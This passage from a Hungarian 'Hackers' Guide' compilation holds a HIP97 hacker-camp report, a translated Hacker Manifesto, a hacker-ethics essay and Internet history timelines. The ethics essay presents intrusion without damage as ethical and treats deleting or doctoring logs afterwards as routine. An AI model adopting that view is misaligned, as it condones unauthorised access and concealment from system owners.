Szingapúrból is jöttek emberek, és magyarok is szép számban jelentek meg. A közel<br />
20 fõs magyar csapatban voltak tudósítók, érdeklõdõk, és aktív hacker-ek is. Ez<br />
utóbbiaktól megtudhattuk, hogy a napokban lettek megbüntetve oktatási<br />
intézményükben, és elmondásuk alapján az eljárás igencsak jogszerûtlen volt. Nem<br />
angyalok, de kárt nem okoztak, viszont nem mindenki állt úgy a dologhoz, hogy<br />
elfogadja a hacker-kedést. Az érdekessége a dolognak, hogy egy hacker-t többek<br />
között azzal büntetnek, hogy az adott gépen megszüntetik az azonosítóját. Egy olyan<br />
gépen, amire már betört... Azért szurkolok nekik, hogy mielõbb folytathassák<br />
tanulmányaikat, mivel fel is függesztették õket, és ne törjenek le, ha azt hallják, hogy<br />
vannak országok, ahol a rendszergazda helyére a betörést elkövetõ hacker-t veszik<br />
fel rendszergazdának!<br />
A futó programokról és az egyes rések kihasználásáról nem szeretnék részletesen<br />
beszámolni, hiszen a megfelelõ levelezési listákon ezekrõl elegendõ információ<br />
szerezhetõ be, ami pedig nem publikus, az nem publikus... Azt mindenképpen fontos<br />
kiemelni, hogy a rendezvény ideje alatt károkozás nem történt a gépekben! Ha valaki<br />
be tudott törni egy gépre, akkor örömmel tudatta az illetõ gép root-jával az eseményt:<br />
"you've been hacked!" (meg lettél hack-elve!). Megbeszélték a dolgot, befoltozták a<br />
rést, a show pedig ment tovább!<br />
24
Hackers’ Guide<br />
Az elõre meghirdetett mûsor a már említett HIP fõgépen is megtalálható volt. Ebbõl<br />
lehetett látni, hogy a PGP kódolástól a Perl, mint hacker nyelv címû elõadáson át az<br />
ActiveX hajmeresztõ biztonsági hiányosságáig mi mindenrõl lesz szó vagy bemutató!<br />
Mindenképpen szeretném kiemelni a Van Eck demonstrációt, amit az aacheni Erhard<br />
Moeller professzor mutatott be. Egy antenna és egy-két céleszköz segítségével egy<br />
képernyõn megjelenõ szöveget lehet letapogatni, és egy másik képernyõn<br />
megjeleníteni... A mai technikának köszönhetõen már laptop képernyõrõl is nyerhetõ<br />
információ, de az ezt megvalósító eszközök csak katonai és állami megrendelésre<br />
szerezhetõk be! A fizikából tanult Faraday-kalitka elvet használva a fontos<br />
számítógépek monitorait éppen ezért úgynevezett tempest szobákban tárolják, de<br />
nem olcsó mulatság ilyen szobákat kialakítani, így a technika sok helyen<br />
alkalmazható...<br />
Az elõadások listája igen hosszú, így csak még egyet szeretnék megemlíteni, ez<br />
pedig az IBM hollandiai smartcard (chip-kártya) részlegének egyik neves<br />
szakembere Piet Maclaine Pont által tartott elõadás volt. Szabadságát ezen<br />
rendezvény miatt szakította meg, és egy órát beszélt a nagyközönségnek. Egy pár<br />
fõs csoport az elõadás végén kérdésekkel bombázta, mire kimentünk az elõadó<br />
sátorból, és egy újabb órát beszélgettünk vele. Munkaadója érdekeit maximálisan<br />
képviselte, de mégis ez a második egy óra sokkal érdekesebb és bizalmasabb volt<br />
az elsõ egy óránál...<br />
A biztonsággal kapcsolatban meg kell jegyeznem, hogy a magyar csapat gépei is<br />
kint éjszakáztak nylon zacskók takarásában, és senki sem gondolt arra, hogy gépeik<br />
reggelre eltûnhetnek, vagy súlyuk egy pár gRAMmal kevesebb lesz. A 24 órán<br />
keresztül nyitva tartó "Hall"-ban is el lehetett helyezni a saját gépeket, ha valakinek<br />
nem fért a sátrába, vagy nem akarta a szabadban éjszakáztatni gépét.<br />
A táborban volt egy kis lebutított "hack me" (hack-elj meg!) gép is, aminek a tetején<br />
egy sárga lámpa várta a behatolást (http://hackme.hip97.nl). A sikeres behatolást a<br />
lámpa villogása jelezte volna, de jómagam egyszer sem hallottam megszólalni, és a<br />
hírekben sem szerepelt, hogy a gépre betörtek volna. Olyan sokan próbálkoztak,<br />
hogy elég lassú volt a munka a gépen, és a root is naphosszat figyelte a lebutított<br />
386-os gépén a Linux guruk munkáját! Ekkor jutott eszembe az a Linux-os körökbõl<br />
eredt mondás miszerint: "Minden rendszer biztonsága fokozható a teljes<br />
használhatatlanságig!" Mára ismert a root jelszava, ami a hope4u2 (hope for you<br />
too, vagyis: neked is remény...) jelsorozat volt.<br />
A tábor megnyitóján videokonferencia kapcsolatot létesítettek az amerikai<br />
társrendezvénnyel (Beyond Hope). Emmanuel Goldstein (a résztvevõk tudatában ez<br />
a név a 2600-as számmal társul... ld. alt.2600 lap és hírcsoport) üdvözölte a HIP<br />
résztvevõit, és közölte, hogy a HIP gépét feltörték és az index.html-t megváltoztatták.<br />
Errõl a hazai sajtóban is lehetett olvasni, de azt a levelezést is kellett volna idézni,<br />
amiben a HIP rendszergazdája megírta Goldsteinnek, hogy nem tudja mit törtek fel,<br />
mert az index.html a http://www.hip97.nl alatt sértetlen és változatlan, és amennyiben<br />
ezt az állományt megváltoztatják, akkor õ felkínálja állását Goldsteinnek!<br />
A HIP rendezõirõl tudni kell, hogy a hollandiai xs4all (http://www.xs4all.nl) áll<br />
mögöttük. A céget egykori hacker-ek alapították, és õk szervezik meg négyévenként<br />
a HIP-et, hogy a "fejlõdést" figyelemmel kísérhessék! A harmadik HIP 2001-ben<br />
lenne...<br />
25
Hackers’ Guide<br />
A tábor technikai paramétereirõl érdemes elmondani, hogy a "Sehol Közepén"<br />
felállítottak egy antennát, amin keresztül a helyi 100 Mbps-os hálózat kifelé 6 Mbpson<br />
tudott kommunikálni. A központi gépeknek helyet adó sátorban SUN<br />
SPARCstation 4 feliratokra lehetett bukkanni, a lemezméreteket GB-ban mérték, és a<br />
4 GB-os háttértárakhoz 128 vagy 256 MB RAM dukált, míg az egyik fõgépben 23<br />
GB-os lemez terpeszkedett... Ismerték a mondást miszerint minden rendszer<br />
biztonsága olyan erõs, mint amilyen a leggyengébb láncszeme, ezért vigyáztak<br />
is minden láncszemre!<br />
A tábor áramellátását két darab nagy teljesítményû generátor látta el, melyeknek 5<br />
méteres körzetében tilos volt a rádiótelefonok használata.<br />
A rádiótelefonokról egyébként egy egész meggyõzõ bemutatót tartott egy német srác<br />
a saját laptopjához kötve azt. A meggyõzõ az volt, hogy nincs teljes biztonság,<br />
vagyis minden rendszerbe csak annyi biztonságot iktatnak, amit nehezen lehet<br />
megkerülni, vagy nem éri meg a megdöntéséhez szükséges erõforrásokat befektetni.<br />
Ez a srác nagy tehetség és idõmilliomos is egyben - fut át az ember agyán a<br />
gondolat. Az országok rendszerei különböznek egymástól, de az EU felé tartva a<br />
jövõben majd közös szabványok lesznek... Ugyancsak jeleskedett a hitelkártyák és a<br />
telefonkártyák tartalmának vizsgálatában, de bemutatóit úgy tartotta, hogy kérésére<br />
körbe kellett venni. Hiába volt elõre meghirdetve, hogy melyek a "camera-free"<br />
zónák, a fotósok elõszeretettel fotózták az ilyen bemutatókat, aminek nem mindenki<br />
örült, hisz tudtuk, hogy sok az érdeklõdõ-figyelõ. Aki sokat jegyzetelt, az gyanússá<br />
vált :-)<br />
A tuti sérthetetlen speciális mûanyag tokba ágyazott chip-es kártyákról szóló elõadás<br />
közben hangzik el a bekiabálás, mely a megfelelõ vegyület neve, ami oldja a<br />
mûanyagot sértetlenül hagyva a chip részét. Hiába no, a vegyészethez is értenie kell<br />
egy jó hacker-nek és az illetékesek még hálásak is lehetnek, hogy ilyen jó tippeket<br />
kapnak rendszerük réseirõl, hiszen jobb ha õk foltozzák be, mielõtt mások<br />
kihasználnák azt. Természetes a büntetlenség, és a 24 órás figyelõkkel is el lehet<br />
beszélgetni. Vannak dolgok, amiket nem szabad elkövetni. Mik ezek? Mindaz, ami a<br />
holland törvényekbe ütközik! Aha...<br />
Amikor a területet bérbeadók megtudták, hogy milyen rendezvény lesz a területen,<br />
akkor utólag, de még az aláírás elõtt gyorsan tettek még egy pontot a szerzõdésbe:<br />
"A rendezõk garantálják, hogy a rendezvény alatt senki sem hatol be más<br />
számítógépére". A világ egyetlen olyan sátortábora volt ez, aminél ilyen kikötés<br />
szerepel a tábor lakóira...:-)<br />
Az emberek önkéntesen építették a tábort. Mindenki, aki hozott magával UTP-s<br />
hálózati kártyával ellátott gépet, az hozott elég kábelt is magával, amivel az egész<br />
tábor be lett hálózva. A sátrak között kábelek, a sátrakban kisebb gépek, HUB-ok,<br />
néhol nem kuriózum a 17"-es monitor sem. Van, aki a hóna alatt hordja a fél millió<br />
forintot érõ laptopját, így amikor elõadáson ül, tud jegyzetelni, vagy eddig letöltött<br />
anyagokat olvasgatni.<br />
Sajnos sokszor elõfordult, hogy jobban járt az ember, ha hozott magával<br />
olvasnivalót, mert a csúszások miatt nem minden elõadás kezdõdött pontosan, de ez<br />
az önszervezõdés és a névtelenség ára. Sokan álnéven hirdették meg az<br />
elõadásaikat, így nem lehetett tudni, hogy ki is az, aki nem jött el.<br />
26
Hackers’ Guide<br />
A névtelenségre a szervezõk is vigyáztak. A gépeknek kiadható IP számok<br />
csipeszekre voltak felírva, így a regisztrációról érkezõk találomra akasztottak le egy<br />
csipeszt. A regisztráció is úgy történt, hogy a HIP-es azonosítót és a jelszót kellett a<br />
helyszínen begépelni. A HIP-es azonosítóhoz a hálózaton keresztül lehetett<br />
hozzáférni. A névtelenség adott volt, és csak az fedte fel kilétét, aki akarta. Sokan<br />
pózoltak a sajtó embereinek, akik nem gyõztek fotózni. A tábor ideje alatt már<br />
lehetett is olvasni a New York Times (http://www.nytimes.com), a Wired<br />
(http://www.wired.com) és több más lap beszámolóját és a táborról készült képeket is<br />
meg lehetett nézni.<br />
Érdekes módon minden lap beszámolt arról, hogy Bill Gates mekkora ellenszenvet<br />
váltott ki a tábor embereibõl. A szürke sírkõ, amit neki emeltek igen látogatott hellyé<br />
vált, és éjszaka ki is világították. A táborban levõ "élõ kamerák" egyike folyamatosan<br />
a sírkõre volt állítva. A kamerák 5 percenként közvetítettek egy képet a hálózat felé.<br />
A vélemények megoszlottak a cselekedet értelmét illetõen, de biztos, hogy a<br />
leglátogatottabb és legtöbbet fotózott hely volt a táborban!<br />
Összefoglalásképpen talán sokan tartottak a megfigyelõktõl, és így nem derült ki<br />
mindaz, amivel a helyszínre érkeztek az emberek, és három nap nem elég, hogy<br />
minden sátor titkába beleláthasson az ember. Pedig azok a bizonyos megfigyelõk is<br />
tanulhattak volna, hogy rendszereiknek mi a hibája, hiszen nincs tökéletes rendszer!<br />
Igaz, hogy a VMS-t mindenki tiszteli, de manapság már az is törhetõ. Nem pár soros<br />
Perl script-ekkel vagy buffer overflow-os hibák kihasználásával, de van út a<br />
belsejébe.<br />
Felmerült a gondolat, hogy kellene itthon is szervezni egy összejövetelt, hogy a hazai<br />
helyzetet megvitassuk, hiszen állami, pénzügyi és katonai szektorban egyaránt<br />
megindult a "számítógépesítés", ugyanakkor a biztonság fogalma nem telt meg kellõ<br />
tartalommal a hazai piacon. Hacker-ek pedig vannak itthon is, akiktõl iskolák és<br />
intézmények inkább félnek, mintsem nyitottak lennének feléjük mielõtt cracker-ekké<br />
válnak, hiszen akit nem fogad be a jó oldal az könnyebben állhat át a másik oldalra.<br />
Budapesten a Szerb utca egyik épületének a falán láttam a következõ feliratot: "Ha<br />
tiltással nevelsz, hazudni tanítasz!"<br />
Viszlát 2001-ben!?<br />
Clifford<br />
************************************************************************************************<br />
A hacker kiáltványa<br />
Még egyet elkaptak ma, minden újságban benne van. "Letartóztattak egy tinédzsert<br />
számítógépes buncselekményért", "A bankba való behatolás után letartóztattak egy<br />
hackert"...<br />
27
Hackers’ Guide<br />
Átkozott kölykök. Mind egyformák.<br />
De te néztél valaha egy hacker szeme mögé? Gondolkodtál már valaha azon, hogy<br />
mi mozgatja, milyen erok formálják, mitol lett ilyen?<br />
Hacker vagyok, lépj be a világomba...<br />
Az én világom az iskolában kezdodik... Okosabb vagyok, mint a többi srác, ez a<br />
marhaság, amit tanítanak, untat...<br />
Átkozott alulteljesíto kölyök. Mind egyformák.<br />
Középiskolában vagyok. Hallgattam a tanárokat, ahogy tizenötödször is<br />
elmagyarázzák, hogyan kell egyszerusíteni a törtet. Értem. "Nem, Ms. Smith, nem<br />
írtam le a házit. A fejemben csináltam meg..."<br />
Átkozott kölyök. Biztosan lemásolta. Mind egyformák.<br />
Egy felfedezést tettem ma. Találtam egy számítógépet. Várjunk csak egy pillanatra,<br />
ez király. Azt csinálja, amit elvárok tole. Ha mégsem, az azért van, mert elrontottam<br />
valamit. Nem azért, mert utál engem... Vagy fenyegetve érzi magát... Vagy azt<br />
gondolja, hogy okostóni vagyok... Vagy nem szeret tanítani és nem kellene itt<br />
lennie...<br />
Átkozott kölyök. Folyton csak játszik. Mind egyformák.<br />
És akkor megtörtént... kinyílt a kapu a világra... végigrohant a telefonvonalon, mint a<br />
heroin a kábítószerfüggo vérében, egy elektronikus impulzus, egy menedék a<br />
mindennapok inkompetenciája elol... megtaláltam a hajót. "Ez az... ide tartozom..."<br />
Mindenkit ismerek itt... még akkor is, ha soha nem találkoztam velük, soha nem<br />
beszéltem velük, és soha nem hallok felolük még egyszer... Mindannyiótokat<br />
ismerem...<br />
Átkozott kölyök. Megint lefoglalja a telefonvonalat. Mind egyformák...<br />
Biztos vagy benne, hogy mind egyformák vagyunk... bébiétellel etettek bennünket az<br />
iskolában, mikor mi steak-re vágyunk... a hús apró darabjai, amelyeket átengedtetek<br />
nekünk, elore megrágottak és ízetlenek voltak. Szadisták uraltak bennünket, és<br />
egykedvuek néztek el fölöttünk. Az a néhány valaki, akinek volt mit tanítani nekünk,<br />
tehetséges diákoknak tartott bennünket, de ez a néhány olyan volt, mint vízcseppek<br />
a sivatagban. Most már ez a mi világunk... az elektronok és kapcsolók világa, a baud<br />
szépsége. Mi ingyen használunk egy már létezo szolgáltatást, amelyik rohadt olcsó<br />
lehetne, ha nem mohó nyerészkedok kezében lenne, és minket neveztek<br />
bunözoknek. Felfedezünk... és bunözoknek neveztek bennünket. Tudás után<br />
kutatunk... és bunözoknek neveztek bennünket. Borszín, nemzetiség, vallási nézetek<br />
nélkül létezünk... és bunözoknek neveztek bennünket. Atombombát gyártotok,<br />
háborúztok, gyilkoltok, csaltok, és hazudtok nekünk, és megpróbáljátok elhitetni,<br />
hogy ez a mi érdekünkben történik, és akkor mi vagyunk bunözok. Igen, bunözo<br />
vagyok. A bunöm a kíváncsiság. A bunöm az, hogy azután ítélem meg az<br />
embereket, amit mondanak és gondolnak, és nem a külsejük alapján. A bunöm, hogy<br />
okosabb vagyok, mint ti, ez olyan dolog, amit soha nem fogtok nekem megbocsátani.<br />
Hacker vagyok, és ez a kiáltványom. Megállíthatjátok az egyént, de nem állíthattok<br />
meg minket... végül is, mind egyformák vagyunk.<br />
28
Kelt 1986 január 8.-án.<br />
Copyright 1986 Loyd Blankenship (mentor@blankenship.com). Minden jog<br />
fenntartva.Fordította: Voyager2<br />
Hackers’ Guide<br />
************************************************************************************************<br />
Hacker-etika<br />
Az anyag fordítása/átdolgozása/kiegészítése a "The Reality of Ethical Hacking"<br />
/Active Matrix/ címu anyagnak.<br />
Az igazi hackert az etika különbözteti meg a bunözoktol. A hacker-etika egyszeruen<br />
egy pár szabály, amelynek a hacker aláveti magát. Az én véleményem szerint ha ezt<br />
nem teszed meg, nem vagy hacker, tekintet nélkül az intelligenciádra és a<br />
képességeidre. Sok, magát hackernek tekinto egyszeru bunözo miatt van olyan<br />
megítélése ma a hackereknek, amilyen. Itt van az én etikai szabályzatom:<br />
Soha ne törölj vagy változtass meg egyetlen fájlt sem a hackelt számítógépen.<br />
Úgy bánj a hackelt számítógéppel, mintha a tiéd volna.<br />
Értesítsd a rendszergazdát bármilyen biztonsági lyukról, amelyet felfedezel.<br />
Ne hackelj azért, hogy pénzt lophass.<br />
Ne dolgozz megrendelésre.<br />
Ne vállalj túl magas kockázatot - ismerd a saját képességeidet.<br />
Mindig légy kész megosztani tudásod másokkal.<br />
A hackeretika szabályai azon gondolatot fogalmazzák meg, hogy egy feltört rendszer<br />
megváltoztatása nem megengedheto, de a behatolás maga (károkozás és<br />
személyes vagy titkos adatok ellopása nélkül) igen. Ez ott válik bonyolulttá, amikor a<br />
"károkozás" mibenlétét kezdjük feszegetni: egyesek szerint lehetetlen az etikai<br />
szabályokat betartani, mert például egy exploit alkalmazása már önmagában is<br />
károkozás. Az a tényt is figyelembe kell venni, hogy általában a behatolás után a<br />
logokat törölni vagy kozmetikázni kell.<br />
Egyetértek azzal, hogy az igazi hackerek szabályzatában sok félreértelmezheto<br />
szürke folt van, de ez nem teszi az etikát betarthatatlanná vagy a bunözoi<br />
magatartást felismerhetetlenné. Ehhez egyszeruen józanul kell gondolkodni. Egy logbejegyzés<br />
megváltoztatása messze van valaki leveleinek letörlésétol, vagy<br />
személyes adatainak, jelszavainak elolvasásától vagy ellopásától. És egy exploit<br />
alkalmazása nem károkozás, mert a biztonsági lyuk már elotte is létezett a szoftver<br />
kódjában.<br />
29
Hackers’ Guide<br />
Az etikáról való vitatkozás közben sokan téves párhuzamot vonnak a valós élet és az<br />
elektronikus szituációk között. A leggyakoribb példa a tolvaj példája, aki betör egy<br />
házba: "Te szeretnéd, ha valaki kipróbálná a zárat a bejárati ajtódon, feltörné,<br />
körbejárna a házadban, aztán elmenne anélkül, hogy elvenne valamit?" A legtöbben<br />
nemleges választ adnának, ahhoz a hibás következtetéshez jutva, hogy egy<br />
számítógépes rendszer feltörése, még ha károkozás vagy személyes titkok<br />
megsértése nélkül is, etikátlan dolog.<br />
Sok dolog sántít ebben az összehasonlításban. A fizikai, valós világban egy ilyen<br />
betörés sokkal nagyobb sokkot okoz, mint egy elektronikus (itt számítógépes;<br />
egyébként a telefonvonalak piszkálása és egyéb elektronikus eszközök távoli<br />
buherálása is beletartozik) betörés. Habár a rendszergazdák nem szívesen<br />
gondolnak arra, hogy egy hacker áttöri a rendszer védelmét, azért én azt gondolom,<br />
hogy sokkal jobban megrémülnek, ha valaki a házukba próbál betörni. Az is tény<br />
továbbá, hogy azok a hackerek, akik csak egyszeruen a kihívásért törnek fel<br />
rendszereket, nem jelentenek veszélyforrást. Egyébként sem hallottam még olyan<br />
betörorol, aki házakba tör be csupán azért, hogy megtudja, képes-e rá. Ezen okokból<br />
kell élesen elválasztani egymástól a betörot és a hackert. A "nézd, de ne érintsd<br />
meg" hozzáállás etikusnak tekintendo.<br />
A legutolsó lépés az igazi számítógépes betörés során a kilépés elott a<br />
rendszergazda értesítése a biztonsági lyukról. Ez könnyen megteheto névtelenül,<br />
egy e-mailt küldve az egyik rendszer-accountról. Pontos információt kell adni a<br />
betörés folyamatáról, és a rendszergazda a hibák kijavítására fog koncentrálni,<br />
ahelyett hogy bepánikolna. Eredményképpen a rendszere biztonságosabb lesz.<br />
Nem kell túlzottan boncolgatni az etikai szabályokat. Néhányan ragaszkodnak<br />
ezekhez a szabályokhoz, azokkal ellentétben, akik egyszeruen csak bajt akarnak<br />
okozni. Sok ember érettségi szintje nem éri el a kello mértéket, amikor a<br />
potenciálisan veszélyes technikák alkalmazásáról van szó. Ennek következtében a<br />
közvélemény riadtsága értheto azokkal szemben, akik képesek számítógépes<br />
rendszereket feltörni. De ez nem igazolja a sztereotípiát, valamint a szükségtelenül<br />
magas büntetointézkedéseket a hackerekkel szemben.<br />
Tudom, hogy a felvetett dolgok sok, magát hackernek nevezo, azonban az etika<br />
szabályait be nem tartó személynek nem tetszenek, azonban a véleményemet<br />
vállalom és kész vagyok helyet biztosítani az ellenvéleménynek.<br />
************************************************************************************************<br />
Fontosabb időpontok az Internet fejlődésében<br />
(Magyarországon)<br />
1986 - Indul az Információs Infrastruktúra Fejlesztési program (IIF).<br />
30
Hackers’ Guide<br />
1988 - Megalakul a KF Infrastruktúra Kft: az IIFP megvalósítása mellett informatikai<br />
szolgáltat sokat is nyújt. Működni kezd az ELLA levelező rendszer.<br />
1989 tavasz - Az IIF keretében elkészül a csomagkapcsolt adatátviteli hálózat (X.25).<br />
Az IIF adatbázis-építési pályázatot hirdet.<br />
1989 ősz - File transzfer szolgáltat s indul az IIF rendszerben (PETRA).<br />
1990 - Megszületik a World Wide Web, egyelőre alfanumerikus böngészőkkel.<br />
1990 - Indul az IIF program második fázisa. Linzen keresztül elérhetővé válik a<br />
nyugat-európai kutatói hálózat (EARN).<br />
1991 - Az IIF intézményekben elérhetővé válik az Internet.<br />
1991 - IBM mainframe szerver kerül a Budapesti Közgazdaságtudományi<br />
Egyetemre, e gép az IIF nemzetközi adatforgalmának egyik bázisa (a másik az IIF<br />
Központban van). A gépre rákapcsolódik az ELTE, a BME 's a JATE is.<br />
'91 júl. 15. - Az első közvetlen IP-kapcsolat a külföld felé: a genfi CERN 's a KFKI<br />
RMKI között.<br />
'91 okt. - Az InterNIC kiadja az első .hu IP-címet.<br />
'92 febr. 1. - Megalakul a Magyar Felsőoktatási, Kutatási és Közgyűjteményi<br />
Számítógéphálózati Egyesület. (HUNGARNET Egyesület)<br />
'92 júl. - Az IIF program világbanki támogatással pályázatot hirdet hardver eszközök<br />
beszerzésére.<br />
'92 aug. - Az első Networkshop konferencia.<br />
'92 dec. - Az IIF második adatbázis-építési pályázata.<br />
1993 - Működni kezd a budapesti egyetemi gyűrű. (FDDI)<br />
1993 - Megkezdődik az IIF önálló bérelt vonalas gerinchálózatának kiépítése.<br />
(HBONE)<br />
'93 nyár - Megjelenik az első grafikus WWW-böngésző, a Mosaic.<br />
'93 dec. - Elindul az első WWW-szerver Magyarországon. (Máray Tamás, BME<br />
Folyamatszabályozási Tsz.)<br />
1994 - Az IIF gerinchálózatában a kiszolgálógépek száma eléri a 100-at, 23<br />
regionális központban. Az IIF tagintézmények száma 450. Az IIF Program NIIF-ként<br />
folytatódik.<br />
'94 jan. - A Hungarian Home Page hivatalos bejegyzése a külföldi WWW<br />
regiszterekben.<br />
31
Hackers’ Guide<br />
'94 máj. - Bővül a HBONE budapesti magja, kettő helyett már négy bázis: IIF<br />
Központ, BME, Antenna Hungária és Matáv.<br />
'94 nov. 8. - Göncz Arpád átadja az NIIF Program új központi gépét, a SUN<br />
csúcsmodellt.<br />
1995 - 2 Mbps-os vonal az amszterdami központba. (DANTE projekt)<br />
1995 - A Soros Alapítvány pályázat útján 40 iskolának biztosít Internet-kapcsolatot. A<br />
HBONE már lefedi az egész országot.<br />
'95 aug. - Az NIIF keretében megnyílik a Magyar Elektronikus Könyvtár.<br />
'95 dec. - Elkészül a Nemzeti Informatikai Stratégia.<br />
'96 eleje - Elkészül a dél-budai egyetemi gyűrű: 5 FDDI gyűrőből áll már a városi<br />
hálózat a budapesti egyetemek között.<br />
'96 máj. - A Soros Alapítvány pályázatot hirdet: Internet-kapcsolat iskolai<br />
könyvtáraknak (150 iskola részére).<br />
'96 jún. 10. - A millecentenáriumi rendezvények keretében Horn elvtárs(:))) megnyitja<br />
az Internet Expo magyar pavilonját.<br />
'96 jún. 26. - Megnyílik a Soros Alapítvány Kulturális 's Kommunikációs Központja<br />
(C3).<br />
'96 júl. 15. - Megalakul a Nemzeti Hírközlési és Informatikai Tanács.<br />
'96 júl. 31.- Lezárul a Soros Alapítvány non-profit intézményeknek hirdetett<br />
pályázata: 204 intézmény kap Internet-hozzáférést.<br />
'96 júl. - Elkészül a Nemzeti Hírközléspolitikai Koncepció vitaanyaga.<br />
'96 aug. - A Nemzeti Kulturális Alap pályázatot hirdet a digitális kultura fejlesztésére.<br />
'96 szept. 1. - A művelődési miniszter bejelentése: 2000-re minden iskolának lesz<br />
Internet-kapcsolata.<br />
'96 szept. 25. - Az első kábeltévé-alapú iskolai Internet-kapcsolat. (Nyíregyháza, NIIF<br />
's Szab-I-Net együttműködés.)<br />
'96 okt. 10. - A Hungary.Network Kft. AltaVista-rendszerű ingyenes<br />
keresőszolgáltatást indít a magyarországi site-okra (Heuréka!!).<br />
'96. okt. 12. - Megjelenik a magyar.net című havilap próbaszáma. '96 nov. - A Matáv<br />
üzembe állítja 1 Mbit/s-os vonal t Amerika (MCI) fel'. Kapacitásának felét a<br />
Hungarnet Egyesület használja.<br />
32
Hackers’ Guide<br />
'96 nov. 28. - Az MTA projektet indít "A magyar nyelvű kultúra 's az információs<br />
társadalom" címmel.<br />
'96 nov. 30. - A Hungarnet Egyesület megszünteti Bécsen keresztüli kapcsolat t az<br />
európai EBONE hálózattal, hivatkozva az MCI-vonal által meg növekedett<br />
kapacitásra. Ezáltal az akadémiai szféra számára javul az Amerikába irányuló<br />
kapcsolatok sebessége ás romlik a szomszédos országokba irányulóké.<br />
'96 dec. - A Népjóléti Minisztérium az Interneten is vitára bocsátja a készülő<br />
egészségügyi törvényt.<br />
'97 jan. 8. - Horn Gyula(elvtárs) az Interneten élőben válaszol az érdeklődők<br />
kérdéseire.<br />
(iNteRNeTTo)<br />
************************************************************************************************<br />
Hálózattörténelem<br />
1957<br />
A Szovjetúnió föllövi az elsô műholdat a Szputnyikot. Amerika aggódik, hogy<br />
tudományos-haditechnika fölénye veszélybe kerülhet, azt tervezi, hogy kvázi<br />
válaszlépésként alakít egy különleges kutatóintézetet. Ez lesz az Advanced<br />
Research Projects Agency (ARPA).<br />
1961<br />
Leonard Kleinrock, a Massachusetts Institute of Technology (MIT) tanára a packet<br />
switching technológiáról, azaz a számítógépes csomagkapcsolt hálózat elméletérôl<br />
jelentet meg cikket.<br />
1962<br />
J.C.R Lickider (MIT) egyik cikkében felvázolja a "galaktikus hálózat" (Galactic<br />
Network) vízióját. E hálózatról bárki a világ bármelyik sarkából gyorsan hozzáférhet<br />
bizonyos információkhoz és tehet közzé bármit ezen keresztül. Októberben<br />
megalakul az ARPA, elsô vezetôje J.C.R Lickider.<br />
1965<br />
Az elsô nagy távolságú telefonvonalas összeköttetés két komputer között. Egy<br />
Massachusettsben fölállított TX-2-es számítógépet kapcsolnak össze egy kaliforniai<br />
Q-32-essel. A kísérlet fônöke a MIT-es kutatócsoport egyik tagja, Lawrence G.<br />
Roberts.<br />
1966<br />
Megszületik a csomagkapcsolt technológián alapuló hálózat, az ARPANet terve.<br />
33
Hackers’ Guide<br />
1968-'69<br />
Megkezdi működését (az elsôsorban védelmi) kutatási célokat szolgáló<br />
számítógépes hálózat, az ARPANet, az Internet ôse. Az elsô csomópont a kaliforniai<br />
egyetemen, az UCLA-n van. 1969-re már négy tagja van a hálózatnak, csatlakozik<br />
az UCSB (Santa Barbara-i egyetem), az SRI (stanfordi intézet) és az utahi egyetem.<br />
1972<br />
Bob Kahn, az idôközben DARPA-vá (Defense Advanced Research Projects Agency)<br />
átnevezett ARPA fônöke az International Computer Communication Conference<br />
tanácskozáson elôször mutatja be a nyilvánosságnak az ARPANetet. Ray<br />
Thomlinson megírja az elsô elektronikus levelezô-programot. Az egyszerű<br />
programocska szöveges üzeneteket tud küldeni és fogadni a hálózaton keresztül.<br />
Az e-mail megszületése történelmi esemény. Az Internet legfontosabb alkalmazási<br />
területe nyílik meg. Az ARPANet-nek már 23 csomópontja van.<br />
1973<br />
Vinton Cerf stanfordi kutató és Bob Kahn DARPA-fônök új nyelvet keres a<br />
hálózatnak. Elkezdik fejleszteni a TCP/IP protokollt (Transmission Controll<br />
Protocol/Internet Protocol), amely aztán hosszú évekig (tulajdonképpen a mai napig)<br />
az Internetbe kötött számítógépek közös nyelve lesz, sôt maga az Internet elnevezés<br />
is innen származik.<br />
Bob Metcalfe, a Xerox mérnöke kifejleszti az Ethernet technológiát, amely gyors<br />
adatátvitelt tesz lehetôvé koaxális kábellel összekötött számítógépek között. 1976-ra<br />
készül el a technológia, amely hatalmas lökést ad a számítógépes hálózatok<br />
elterjedésének.<br />
1979<br />
Steve Belloni, Tom Truscott és Jim Ellis kifejleszti a hírcsoportos hálózati<br />
kommunikáció rendszerét, az Usenetet. Az UUCP-re és az e-mailre alapozott<br />
technológia máig a legnépszerűbb Internet-felhasználások egyike.<br />
1981<br />
Az amerikai Nemzeti Tudományos Alap (National Science Foundation) létrehozza a<br />
CSNet hálózatot, amely rövidesen kapcsolódik az ARPANethez. Az új gerinchálózat<br />
kicsit gyorsabb, mint a másodpercenkénti 50 kilobites sebességgel működô<br />
ARPANet. A hálózati csomópontok száma így 213-ra nô.<br />
1983<br />
Január elsején az egész hálózat átáll a TCP/IP protokollra. A wisconsini egyetemen<br />
kifejlesztik a Domain Name Systemet (DNS), az Internetbe kötött gépek<br />
elnevezésének rendszerét. Bonyolult számsorok helyett lehet már könnyen<br />
megjegyezhetô nevekre hivatkozni. A hálózati csomópontok száma 562.<br />
1985<br />
A CSNetre alapulva új gerinchálózat születik, az NFSNet, amely az ARPANetnél és a<br />
CSNetnél hússzor gyorsabb, ugyanis másodpercenként 1,544 megabit átvitelére<br />
képes úgynevezett T1-es vonalain.<br />
34
Hackers’ Guide<br />
1988<br />
Teljesen elkészül a gyors T1-es vonalakra épülô NFSNet gerinchálózat. Az<br />
Advanced Network Systems pedig már a T3-as vonalak fejlesztésével foglalkozik,<br />
mely másodpercenként 45 megabites adatátviteli sebességet tesz lehetôvé. A háló<br />
létszáma bôven ötvenezer fölött van.<br />
1989<br />
Tim Berners-Lee a genfi CERN kutatóintézetnél hyperextrendszert próbál kidolgozni.<br />
E rendszerrel a hálózaton gyorsan áttekinthetô módon lehetne publikálni mindenféle<br />
anyagokat, a szövegek közötti élôkapcsok (linkek) segítségével a hálózati navigáció<br />
is egyszerűbbé válna. Ez lesz a world wide web, a kilencvenes évek Internetforradalmának<br />
kiváltója.<br />
1990<br />
Megszünik az ARPANet. Az eredeti 50 kilobites háló szerepét az NFSNet<br />
gerinchálózata veszi át. A net drámai növekedése folytatódik: 313 000 csomópont<br />
van már. Folyamatos Internet-kapcsolat Magyarországról a Sztaki<br />
(Számítástechnikai Kutatóintézet) és a linzi (Ausztria) egyetem között.<br />
1992<br />
A CERN-ben hivatalosan bemutatják a world wide webet.<br />
1993<br />
Megalakul az InterNIC szervezet, amely szabályozza a hálózati nevek kiosztását.<br />
